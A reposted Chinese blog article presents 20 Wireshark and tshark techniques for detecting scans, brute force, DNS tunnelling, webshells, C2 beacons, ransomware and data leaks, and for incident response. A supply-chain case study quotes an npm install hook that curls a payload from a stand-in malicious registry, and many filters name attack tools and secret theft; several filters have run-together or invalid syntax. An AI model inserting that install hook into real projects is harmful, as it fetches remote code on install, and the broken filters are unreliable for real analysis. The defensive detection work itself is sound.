一、基础配置篇
-
1. 安全捕获环境搭建
# 创建隔离分析环境
sudo ip linkset eth0 promisc on
sudo tcpdump -i eth0 -s 0 -w /mnt/isolated/evidence.pcap
-
2. 预置过滤模板
# 高危协议快速过滤
tcp.port in {135,139,445,3389} || udp.port in {53,123,161,500,4500}
-
3. 关键字段标记
-
• 右键点击IP → Apply as Column
-
• 将TTL异常值设为显眼红色(TTL<64 or TTL>128)
二、攻击检测篇
-
4. 扫描行为识别
# SYN扫描检测
tcp.flags.syn==1and tcp.flags.ack==0and tcp.window_size <=1024
-
5. 暴力破解捕获
# SSH爆破特征
tcp.port==22and (tcp.flags.reset==1or tcp.analysis.retransmission)
-
6. DNS隐蔽隧道
# 检测长域名请求
dns and frame.len > 256 && !contains(dns.qry.name,".google.")
-
7. WebShell通信特征
http.content_type=="application/octet-stream"
&& http.request.method=="POST"
&& frame.len >1024
-
8. 勒索软件通信
tcp contains "GET /decrypt_instructions"
|| tls.handshake.extensions_server_name=="lockbit"
三、数据泄露监控
-
9. 信用卡外泄检测
frame matches "\b[3456]\d{3}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b"
-
10. 数据库拖库行为
mysql.query contains "SELECT"
&& frame.len >1500
&& tcp.srcport==3306
-
11. 云凭据泄露
http.request.uri contains "?AccessKeyId="
|| tls contains "AKIA"
四、高级威胁狩猎
-
12. Cobalt Strike检测
# Beacon心跳包特征
tcp.payload matches "\x00\x00\x00..\xff\xff\xff"
&& tcp.len between 20and50
-
13. Metasploit载荷识别
http contains "Meterpreter"
|| tcp contains "core_loadlib"
-
14. 域渗透横向移动
smb || kerberos
&& (ip.src==<域控IP>or ip.dst==<域控IP>)
-
15. 内存攻击特征
tcp contains "\x90\x90\x90"# NOP sled检测
|| http contains ".dll"
五、加密流量分析
-
16. TLS指纹识别
# 检测恶意JA3指纹
tls.handshake.ja3 contains "6734f37431670b3ab4292b8f60f29984"
-
17. 证书异常检测
tls.handshake.certificate
&& (x509sat.uTF8String == "Phishing Ltd"
|| x509ce.dNSName == "freevpn.malicious.ru")
六、应急响应实战
-
18. 攻击时间轴重建
tshark -r attack.pcap -T fields -e frame.time
-e ip.src -e ip.dst -e tcp.port > timeline.csv
-
19. 恶意文件提取
# 从HTTP流量中提取PE文件
tshark -r infection.pcap --export-object http,./malware
-
20. 攻击者画像生成
# 提取攻击链关键信息
echo"=== C2服务器 ==="
tshark -r c2.pcap -Y "dns" -T fields -e dns.qry.name
echo"=== 用户代理 ==="
tshark -r c2.pcap -Y "http.user_agent" -T fields -e http.user_agent
七、法律合规要点
-
• 取证规范:全程使用 editcap
保留原始时间戳 -
• 哈希校验: sha256sum evidence.pcap > chain_of_custody.txt
-
• 隐私过滤:使用 tcprewrite
匿名化用户数据
tcprewrite --infile=raw.pcap --outfile=anon.pcap
--dstipmap=192.168.1.0/24:10.0.0.0/24
八、真实攻击案例分析
案例1:供应链攻击溯源
-
1. 捕获异常NPM包更新请求:
HTTP/1.1200 OK
Content-Type: application/json
{"version":"1.2.3","scripts":{"install":"curl http://mal-registry.com/payload.sh"}}
-
2. 追踪关联IP:
tshark -r breach.pcap -Y "ip.addr==203.0.113.5" -z conv,ip
案例2:金融木马通信解密
-
1. 提取恶意DLL中的RC4密钥 -
2. Wireshark配置协议解密:
Protocols -> TLS -> (Pre)-Master-Secret log: /path/to/keys.log
九、高阶技巧拓展
-
• 流量基线比对:使用 capinfos
建立正常流量指纹
capinfos -Tm -r baseline.pcap > baseline_profile.txt
-
• AI辅助分析:集成Suricata告警日志
tshark -r traffic.pcap -Y "frame.comment contains 'ET PHISHING'"
-
• 工控协议解析:自定义Modbus/TCP解析器
dissector_add_uint("tcp.port", 502, modbus_handle);
十、重要提醒
-
1. 三层验证原则:流量特征+行为模式+外部情报 -
2. 避免分析陷阱: -
• 勿将CDN IP误判为攻击源 -
• 识别合法的云服务通信(如AWS metadata) -
3. 持续更新知识库: -
• 每日更新 GeoIP2
数据库 -
• 订阅威胁情报Feeds
某次金融攻防演练中,攻击者使用域前置技术隐藏C2通信。防守方通过Wireshark发现异常:
HTTP/2200 OK
:authority: legit-cdn.com
x-amz-cf-pop: SIN2-C1 # 新加坡节点但TLS证书却显示:
x509ce.dNSName: c2-malicious.tk
正是这0.5秒的协议解析差异,阻止了千万级资金损失
附:分析师必备过滤库
# 内网横向移动检测
smb || ldap || winrm || wmi
# 加密挖矿特征
tcp contains "stratum+tcp"
|| http contains "xmr"
# 钓鱼页面识别
http contains "login"
&& http contains "password"
&& !(http.host contains "corp")
当0day攻击发生时,EDR可能沉默、防火墙可能失效,但流过网卡的数据包永远是最诚实的证人。掌握这20项核心技能,意味着你拥有了穿透网络迷雾的终极武器。
原文始发于微信公众号(HACK之道):20个Wireshark在网络安全分析中的实战技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论